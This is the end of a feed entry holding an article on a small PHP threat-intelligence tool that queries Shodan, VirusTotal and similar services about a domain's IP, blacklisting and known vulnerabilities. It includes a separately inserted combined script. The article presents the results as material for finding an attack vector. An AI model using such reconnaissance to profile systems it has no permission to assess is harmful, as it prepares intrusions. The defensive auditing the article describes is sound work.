&lt;li&gt;Phishtank&lt;/li&gt;
&lt;li&gt;Vulners&lt;/li&gt;
&lt;li&gt;Open Bug Bounty&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Let's see how it works:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Through a native PHP function we find the IP address of the domain name with which we need to start our analysis&lt;/li&gt;
&lt;li&gt;We then send the IP/domain name to Shodan and other platforms to receive all the required data regarding IP blacklisting for spam and malware activity; we can also see the IP address change history (which can help detect an IP hidden behind WAF/CDN/Anti-DDoS services)&lt;/li&gt;
&lt;li&gt;It may help you find possible vulnerabilities disclosed by bug hunters through the OpenBugBounty project&lt;/li&gt;
&lt;li&gt;Vulners will show you all known vulnerabilities for detected and outdated software installed on your server&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;In my case I also added services like "have i been pwned" and "IBM X-Force" to get more up-to-date data regarding the target:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--HLcpfMAb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/7cvo3o872yn3cji3ioyj.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--HLcpfMAb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/7cvo3o872yn3cji3ioyj.PNG" alt="alt text" title="Dev.to check with custom threat intelligence platform"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--G4bxZ8nF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/uhq5k7e0ehqqds2qrc00.PNG" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--G4bxZ8nF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://thepracticaldev.s3.amazonaws.com/i/uhq5k7e0ehqqds2qrc00.PNG" alt="alt text" title="Dev.to check with custom threat intelligence platform"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, you don't need to be a professional security engineer or developer to find this data and make a basic security check of a project; there are only a few things we need to do:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Find applicable services&lt;/li&gt;
&lt;li&gt;Read API docs&lt;/li&gt;
&lt;li&gt;Know basic PHP with curl&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Below are two functions, one for Shodan and another for VirusTotal:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
function shodanHost($host) {
    $ch = curl_init();
    // The API key goes in the query string; keep it out of source control (e.g. read it from the environment)
    curl_setopt($ch, CURLOPT_URL, "https://api.shodan.io/shodan/host/".rawurlencode($host)."?key=&amp;lt;YourApiKey&amp;gt;");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Leave TLS certificate and hostname verification on (the curl defaults);
    // turning them off lets anyone on the network path feed you forged intelligence
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    $shodanResponse = curl_exec($ch);
    if ($shodanResponse === false) {
        // Surface transport errors instead of silently json_decode()-ing "false"
        $error = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException("Shodan request failed: ".$error);
    }
    curl_close($ch);
    return json_decode($shodanResponse);
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
function virustotalCheck($url) {
    $ch = curl_init();
    // VirusTotal v2 domain report; the key is a query parameter, so do not commit it with the code
    curl_setopt($ch, CURLOPT_URL, "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YourApiKey&amp;amp;domain=".rawurlencode($url));
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    // Same as above: keep certificate and hostname verification enabled
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    $virustotalResponse = curl_exec($ch);
    if ($virustotalResponse === false) {
        $error = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException("VirusTotal request failed: ".$error);
    }
    curl_close($ch);
    return json_decode($virustotalResponse);
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;All responses come back in easy-to-understand structured formats decoded from JSON, which you can then output as you wish. Based on this approach you can work with the received data and develop a possible attack or research vector.&lt;/p&gt;
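&lt;p&gt;The four steps above (resolve the name natively, query each platform, keep one source's failure from hiding the others, pick out the fields worth correlating) put together in one script. This is an added example and not the article's own code: the function names, the environment variable names SHODAN_API_KEY and VT_API_KEY, the 15-second timeout and the two response fields it reads (Shodan's ports list and the VirusTotal v2 detected_urls list) are my assumptions, so check them against the current API docs before relying on them.&lt;/p&gt;

```php
&lt;?php
// Added example (not from the article). Resolves a domain to its IP and enriches it
// from Shodan and VirusTotal with TLS verification left on, API keys read from the
// environment and transport/HTTP errors reported instead of silently decoded.

function tiGet(string $url): array {
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER =&gt; true,
        CURLOPT_TIMEOUT        =&gt; 15,     // assumption: 15 s is enough for these APIs
        CURLOPT_SSL_VERIFYPEER =&gt; true,   // curl defaults, stated explicitly on purpose
        CURLOPT_SSL_VERIFYHOST =&gt; 2,
    ]);
    $body = curl_exec($ch);
    $err  = curl_error($ch);
    $code = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($body === false) {
        throw new RuntimeException("curl failed: $err");
    }
    if ($code !== 200) {
        throw new RuntimeException("HTTP $code from $url");
    }
    $data = json_decode($body, true);
    if (!is_array($data)) {
        throw new RuntimeException("non-JSON response from $url");
    }
    return $data;
}

function apiKey(string $name): string {
    // assumption: keys live in the environment, never in the source file
    $key = getenv($name);
    if ($key === false || $key === '') {
        throw new RuntimeException("$name is not set");
    }
    return $key;
}

function shodanHost(string $ip): array {
    $url = 'https://api.shodan.io/shodan/host/' . rawurlencode($ip)
         . '?' . http_build_query(['key' =&gt; apiKey('SHODAN_API_KEY')]);
    return tiGet($url);
}

function virustotalDomain(string $domain): array {
    // Legacy v2 endpoint, the one the article uses
    $url = 'https://www.virustotal.com/vtapi/v2/domain/report?'
         . http_build_query(['apikey' =&gt; apiKey('VT_API_KEY'), 'domain' =&gt; $domain]);
    return tiGet($url);
}

function checkDomain(string $domain): array {
    // Step 1: native PHP resolution. gethostbyname() returns its input unchanged on failure.
    $ip = gethostbyname($domain);
    if ($ip === $domain) {
        throw new RuntimeException("could not resolve $domain");
    }
    $report = ['domain' =&gt; $domain, 'ip' =&gt; $ip];

    // Step 2: query each platform; one failing source must not hide the others.
    $sources = [
        'shodan'     =&gt; function () use ($ip) { return shodanHost($ip); },
        'virustotal' =&gt; function () use ($domain) { return virustotalDomain($domain); },
    ];
    foreach ($sources as $name =&gt; $call) {
        try {
            $report[$name] = $call();
        } catch (RuntimeException $e) {
            $report[$name] = ['error' =&gt; $e-&gt;getMessage()];
        }
    }

    // Step 3: pull out the fields worth correlating (field names are assumptions, see lead-in).
    $report['open_ports']  = $report['shodan']['ports'] ?? [];
    $report['vt_detected'] = count($report['virustotal']['detected_urls'] ?? []);
    return $report;
}

if (PHP_SAPI === 'cli' &amp;amp;&amp;amp; isset($argv[1])) {
    echo json_encode(checkDomain($argv[1]), JSON_PRETTY_PRINT), PHP_EOL;
}
```

&lt;p&gt;Run it as &lt;code&gt;SHODAN_API_KEY=... VT_API_KEY=... php check.php example.com&lt;/code&gt;. The two points that differ from the minimal functions above are worth keeping in any version you write: a per-source try/catch so a rate limit on one API still leaves you the others' data, and a non-200 or non-JSON response treated as an error rather than as "no findings".&lt;/p&gt;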

&lt;p&gt;P.S. Using services like Shodan or VirusTotal for information gathering is not a violation, and you don't need to execute real scans against systems and services; still, you can obtain very informative data to find out possible security issues.&lt;/p&gt;

</description>
      <category>threatintelligence</category>
      <category>php</category>
      <category>curl</category>
      <category>infosec</category>
    </item>
  </channel>
</rss>
